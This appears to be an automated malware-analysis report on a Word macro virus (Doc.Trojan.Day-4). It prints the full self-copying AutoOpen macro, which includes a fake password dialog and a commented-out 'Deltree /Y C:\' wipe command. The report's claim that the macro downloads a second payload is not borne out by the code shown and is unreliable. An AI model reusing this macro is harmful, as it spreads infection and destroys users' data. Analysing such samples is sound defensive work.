MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine, a common technique for malicious Office documents. The macro attempts to display a dialog box labeled 'Validation Check' with a dropdown list and a picture, likely as a lure to trick the user into executing further malicious actions. The presence of a Shell() call within the VBA code strongly suggests the macro is intended to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Trojan.Day-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Day-4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3386 bytes |
SHA-256: 3a725709d2fdde8a56ce95eabcfaa95379d8ea4abfff383fce4bd90f6488ed2b |
|||
|
Detection
ClamAV:
Doc.Trojan.Day-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "autoopen"
Public Sub MAIN()
Dim thisday
Dim DayFlag
Dim Button
Dim Flag$
Dim False_
ReDim NameList__$(3)
WordBasic.DisableInput
NameList__$(0) = "µçÄÔ²¿"
NameList__$(1) = "IBM"
NameList__$(2) = "MicroSoft"
NameList__$(3) = "Compaq"
thisday = WordBasic.WeekDay(WordBasic.Now()) - 1
'MsgBox Str$(thisday)
If WordBasic.CountWindows() = 0 Then
WordBasic.FileNew
WordBasic.SetDocumentVar "NewFlag", "True"
Else
WordBasic.SetDocumentVar "NewFlag", "False"
End If
WordBasic.SetDocumentVar "CloseFlag", "True"
WordBasic.BeginDialog 320, 144, "Validation Check", "AutoOpen.MyFunc"
WordBasic.OKButton 170, 108, 88, 21
WordBasic.DropListBox 106, 33, 160, 38, NameList__$(), "DropListBox1"
WordBasic.Text 20, 33, 68, 13, "UserName£º", "Text1"
' Text 19, 62, 48, 13, "UserId£º", .Text2
' TextBox 106, 60, 160, 18, .TextBox1
WordBasic.Text 119, 8, 78, 13, "Certification", "Text3"
WordBasic.Picture 3, 88, 118, 54, "fig", 1, "Picture1"
WordBasic.EndDialog
Dim LoginDlg As Object: Set LoginDlg = WordBasic.CurValues.UserDialog
DayFlag = WordBasic.Today() > WordBasic.DateSerial(97, 7, 20)
If ((thisday = 3) Or (thisday = 5)) And DayFlag Then Button = WordBasic.Dialog.UserDialog(LoginDlg)
Flag$ = WordBasic.[GetDocumentVar$]("CloseFlag")
If (DayFlag = False_) Then Flag$ = "False"
'MsgBox Flag$ + " "
If WordBasic.[FileNameFromWindow$]() <> "" Then
On Error GoTo -1: On Error GoTo Infest
WordBasic.MacroCopy WordBasic.[FileNameFromWindow$]() + ":AutoOpen", "AutoOpen"
Infest: On Error GoTo -1: On Error GoTo NInfest
WordBasic.MacroCopy "AutoOpen", WordBasic.[FileNameFromWindow$]() + ":AutoOpen"
NInfest:
If (thisday <> 3) And (thisday <> 5) Then
WordBasic.FileSaveAll 1, 1
Flag$ = "False"
End If
End If
If Flag$ = "True" Then ExitWord
End Sub
Private Function MyFunc(identifier$, action, suppvalue)
Select Case action
Case 1 'The Dialog Displayed
Case 2 ' the user Selects a Control
If identifier$ = "DropListBox1" Then
Dim Password$
Password$ = "0"
On Error Resume Next
Password$ = WordBasic.[InputBox$]("Input your Password")
If (WordBasic.DlgValue("DropListBox1") = 0) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
ElseIf (WordBasic.DlgValue("DropListBox1") = 1) And (WordBasic.Val(Password$) <> 20300) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
ElseIf (WordBasic.DlgValue("DropListBox1") = 2) And (WordBasic.Val(Password$) <> 36000) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
ElseIf (WordBasic.DlgValue("DropListBox1") = 3) And (WordBasic.Val(Password$) <> 40004) Then
WordBasic.SetDocumentVar "CloseFlag", "True"
Else
WordBasic.SetDocumentVar "CloseFlag", "False"
End If
End If
Case 3 ' Text Changed
'MsgBox LoginDlg.TextBox2
Case Else
End Select
End Function
Private Sub ExitWord()
'Shell Environ$("COMSPEC") + "/c Deltree /Y C:\"
WordBasic.SetTemplateDirty
WordBasic.FileSaveAll 1, 1
WordBasic.AppClose
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.